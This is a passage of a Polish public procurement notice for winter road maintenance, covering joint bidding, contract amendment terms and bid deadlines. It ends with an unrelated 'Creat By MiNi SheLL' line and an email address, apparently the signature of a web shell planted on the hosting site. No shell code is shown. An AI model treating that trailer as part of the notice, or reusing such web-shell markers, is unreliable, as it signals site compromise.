12.1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy zobowiązani są do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>12.2.	Pełnomocnictwo należy dołączyć do oferty i powinno ono zawierać w szczególności wskazanie:<br/>1)	postępowania o udzielenie zamówienie publicznego, którego dotyczy;<br/>2)	wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia;<br/>3)	ustanowionego pełnomocnika oraz zakresu jego umocowania.<br/>12.3.	W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, dokument ”Oświadczenia o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału”, o którym mowa w pkt. 9.1 ppkt 2 SWZ, składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 25.2.	Zamawiający dopuszcza możliwość dokonania zmian umowy w następującym zakresie i na określonych poniżej warunkach:<br/>1. Zamawiający nie zapewnia ciągłości wykonywania przedmiotu umowy.<br/>2. Zamawiający dopuszcza możliwość dokonania zmian zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy. Zmiana umowy musi zostać dokonana w drodze obustronnie podpisanego pisemnego aneksu pod rygorem nieważności.<br/>3. Zamawiający przewiduje możliwość wprowadzenia odpowiednich zmian zawartej umowy w zakresie wysokości wynagrodzenia należnego Wykonawcy oraz określa warunki takiej zmiany, w przypadku zmiany ustawowej zmiany stawki podatku od towarów i usług (VAT), jeżeli zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę, przy jednoczesnym zachowaniu cen jednostkowych netto przedstawionych w ofercie przez Wykonawcę. <br/>4. W przypadku zaistnienia przesłanki do zmiany postanowień zawartej umowy, jak w ust. 3 niniejszego paragrafu, Zamawiający dopuszcza możliwość zwiększenia lub zmniejszenia wynagrodzenia brutto należnego Wykonawcy o kwotę równą różnicy między nowo obowiązującą, a dotychczasową wysokością stawki podatku od towarów i usług (VAT). W oparciu o powyższe Zamawiający sporządzi aneks do umowy, który zweryfikuje wynagrodzenie Wykonawcy od momentu zaistnienia przesłanki do zmiany postanowień zawartej umowy, jak w ust. 3 niniejszego paragrafu.<br/>5. Zamawiający przewiduje możliwość wprowadzenia odpowiednich zmian zawartej umowy w zakresie zmiany zapisów dot.: wykonania przedmiotu umowy własnymi siłami, bez pomocy podwykonawców lub wykonania przedmiotu umowy przy pomocy podwykonawcy/podwykonawców oraz innych powiązanych z ww. zapisami postanowień oraz określa warunki takiej zmiany, w przypadku zmiany polegającej na:<br/>- rezygnacji z dotychczasowego podwykonawcy i realizacji umowy własnymi siłami, bez pomocy podwykonawcy/ców - w przypadku gdy Wykonawca w treści oferty zadeklarował realizację zamówienia przy pomocy podwykonawcy/ców,<br/>- rezygnacji z dotychczasowego podwykonawcy i dopuszczeniu do udziału nowego/wych podwykonawcy/ców - w przypadku gdy Wykonawca w treści oferty zadeklarował realizację zamówienia przy pomocy podwykonawcy/ców.<br/>- dopuszczeniu do udziału podwykonawcy/ców - w przypadku gdy Wykonawca w treści oferty zadeklarował samodzielną realizację zamówienia.<br/>6. W przypadku zaistnienia przesłanki do zmiany postanowień zawartej umowy, jak w ust. 5 niniejszego paragrafu, Zamawiający dopuszcza możliwość w zakresie zmiany zapisów dot.: wykonania przedmiotu umowy własnymi siłami, bez pomocy podwykonawców lub wykonania przedmiotu umowy przy pomocy podwykonawcy/podwykonawców oraz innych powiązanych z ww. zapisami postanowień. Wykonawca w takiej sytuacji jak wyżej zobowiązany jest do następujących czynności: <br/>1) poinformowania Zamawiającego czy zamierza tylko zrezygnować z dotychczasowego podwykonawcy, czy też zamierza zrezygnować z dotychczasowego podwykonawcy i wskazać nowego podwykonawcę lub wskazać podwykonawcę w sytuacji, gdy Wykonawca w treści oferty zadeklarował samodzielną realizację zamówienia, <br/>2) wskazać część/zakres przedmiotu umowy, której wykonanie zamierza powierzyć podwykonawcy,<br/>3) w przypadku wskazania nowego podwykonawcy Wykonawca powinien zawrzeć umowę, w formie pisemnej, z nowym podwykonawcą zgodnie z zapisami o których mowa w § 9 dot. podwykonawców,<br/>4) wykazać spełnienie warunków udziału w postępowaniu przez nowego podwykonawcę lub samodzielnie, w stopniu nie mniejszym niż wymagany w trakcie postępowanie o udzielnie przedmiotowego zamówienia, w przypadku gdy Wykonawca polegał na zasobach podwykonawcy na zasadach określonych w art. 118-123 ustawy z dnia 11 września 2019 r. prawo zamówień publicznych. Zmiana postanowień zawartej umowy nie może wpłynąć negatywnie na sposób wykonywania przez Wykonawcę przedmiotu zamówienia... pkt 25 SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-17 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://e-propublico.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-17 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zamawiający przewiduje udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 i 8 ustawy Pzp:<br/>W zakresie podstawowego przedmiotu zamówienia tj. odśnieżania dróg, chodników, zatok autobusowych, placów, zwalczanie i likwidowanie śliskości(gołoledzi) poprzez stosowanie materiałów uszorstniających do posypywania(mieszanka piaskowo solna) do ogólnej wysokości ok. 48,85 % jego wartości na warunkach określonych w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com